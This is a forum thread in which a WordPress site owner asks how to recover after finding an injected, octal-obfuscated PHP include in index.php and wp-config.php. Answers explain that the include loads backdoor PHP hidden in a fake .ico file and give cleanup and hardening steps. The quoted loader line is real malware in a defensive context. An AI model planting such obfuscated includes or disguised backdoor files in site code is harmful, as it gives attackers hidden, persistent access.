skip to Main Content

It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php

<?php
/*6b9bb*/

@include "57ho155e/151nt145r7602/160ub154ic137ht155l/167p-151nc154ud145s/152s/164in171mc145/.146b463d6700.151co";

/*6b9bb*/

I have changed:

  1. WP Admin URL and put strong password username
  2. changed cpanel/FTP password with strong one
  3. Implemented iTheme Security
  4. Updated WordPress to latest (themes and plugins)

However, the code again repeated. What can be good solutions?

p.s. I am using siteground.

Thanks

3

Answers


  1. Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)

    /home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

    Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
    At the moment closing the initial front-door they use is your sole occupation.

    Follow the advice in this article:
    https://codex.wordpress.org/FAQ_My_site_was_hacked
    And then: https://codex.wordpress.org/Hardening_WordPress

    Here are some links about backdoors:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

    Login or Signup to reply.
  2. Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you’ll have to replace all files with fresh downloads. mostly it’s straight forward:

    • Backup the whole installation (just in case)
      • Download the complete wp-content/uploads folder
      • Make a Screenshot or save the page with the currently active plugins
      • Delete ALL files
      • Get a fresh wordpress setup and extract it
      • Download a fresh copy of your theme and child-theme (recreate the previous setup)
      • Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you’re already connected with your DB
      • Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
      • Reinstall all plugins, fresh downloads
    Login or Signup to reply.
  3. I faced this problem too, and step by step I did the steps below:

    • Cleaning the injected code, manually
    • Changing all the passwords
    • Hiding the WP admin dashboard URL
    • Limiting the login attempts
    • Installing security plugins (Sucuri, Wordfence security)
    • Contracting with Sucuri plan
      The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
      you can also visit this link too
      https://naderzad.info/web-development/wordpress-code-injection/
    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search